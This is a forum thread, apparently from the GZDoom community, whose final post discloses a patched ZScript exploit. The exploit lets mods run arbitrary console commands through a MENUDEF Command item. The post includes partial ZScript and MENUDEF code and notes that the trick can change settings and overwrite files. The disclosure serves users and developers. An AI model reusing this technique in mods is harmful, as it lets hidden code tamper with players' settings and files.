Fri Jun 18, 2021 11:41 pm
Sat Jun 19, 2021 2:18 pm
Graf Zahl wrote:This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.
Sat Jun 19, 2021 2:50 pm
Sat Jun 19, 2021 2:58 pm
TheMightyHeracross wrote:Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.
Sat Jun 19, 2021 3:09 pm
Sat Jun 19, 2021 4:12 pm
TheMightyHeracross wrote:Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.
Fri Jul 02, 2021 2:00 pm
Fri Jul 02, 2021 2:03 pm
Fri Jul 02, 2021 2:53 pm
Matt wrote:The "Hi!" will also print in LZDoom 3.87c.
Fri Jul 02, 2021 8:33 pm
As of June 30, crashes to desktop with "Attempt to execute CCMD 'echo hi!' outside of menu code".drfrag wrote:Matt wrote:The "Hi!" will also print in LZDoom 3.87c.
Try with the latest devbuild.
Sat Jul 03, 2021 1:11 am
Sun Jul 25, 2021 9:11 am
Sun Jul 25, 2021 10:25 am
Wed Jul 28, 2021 7:40 am
The Zombie Killer wrote:[Developer's note: This post has been edited from its original form for clarity]
This post serves as disclosure for an exploit that was recently discovered in ZScript.
The exploit affects all versions between 3.0.0 to 3.2.3, but has been patched in 3.2.4.
ZScript has exposed various features to modders, one of these being the underlying code for the classes powering MENUDEF.
However, the exposure of this MENUDEF code has brought some security concerns along with it.
In MENUDEF, you are able to create menu items that will execute a console command when a user selects them, via the "Command" item.
The code behind this item has a private method named "DoCommand", which is effectively a ZScript version of Zandronum's famous "ConsoleCommand", but without the whitelist.
Normally, you aren't able to make use of DoCommand, as it's private and mostly barred off.
If the item's ZScript class is not "OptionMenuItemSafeCommand", the following checks are made:
- The command will not execute if a menu is not active.
- The command will not execute if the active menu is not an OptionMenu.
- The command will not execute if the Command item does not exist in the active menu (eg, if you created it with new()).
You would expect this to cover the hole pretty well. However, it proved to be trivial to circumvent the above checks.
You could create your own menu linked to ZScript and give it a "Command" item. From there you could modify the Command item's action (the console command it executes) and then proceed to open and close the menu to run the command. The entire MENUDEF file looks like this:
Command "", ""
And all of the ZScript backing it up is as follows:
class ConsoleCommandMenu : OptionMenu
static void Execute(Name command)
let desc = OptionMenuDescriptor(MenuDescriptor.GetDescriptor('ConsoleCommandMenu'));
let item = OptionMenuItemCommand(desc.mItems);
static play void Execute(string command)
class ConsoleCommandHandler : EventHandler
private Array<ConsoleCommand> m_Commands;
static void QueueCommand(string command)
let cmd = new("ConsoleCommand");
cmd.Command = command;
cmd.GameTic = gametic;
override void WorldTick()
for(int i = 0; i < m_Commands.Size(); i++)
if (m_Commands[i].GameTic == gametic - 1) continue;
i = -1;
override void UiTick()
for(int i = 0; i < m_Commands.Size(); i++)
if (m_Commands[i].GameTic == gametic - 1)
The ZScript code effectively queues up console commands using a custom structure, and executes them by opening and closing the menu after modifying the Command item's action (using the Init() method).
After the above code has been written, all that's left to do for this to be usable is to hook up the EventHandler in MAPINFO:
AddEventHandlers = "ConsoleCommandHandler"
And now we're free to execute console commands at will:
Of course, this brings with it a number of concerns. A very incomplete list of which can be found below:
- A user's settings including bindings, audio volume, player name, colour, etc can all be permanently modified.
- Files on the user's system can be overwritten with the logFile command.
As this exploit has been patched in 3.2.4 to the point of not being able to modify arbitrary files on a user's system, I strongly suggest that you update.
Attached below is a sample pk3 demonstrating the exploit. Run the sample with a version of GZDoom prior to 3.2.4 and spawn the "Evil" actor to see it in action.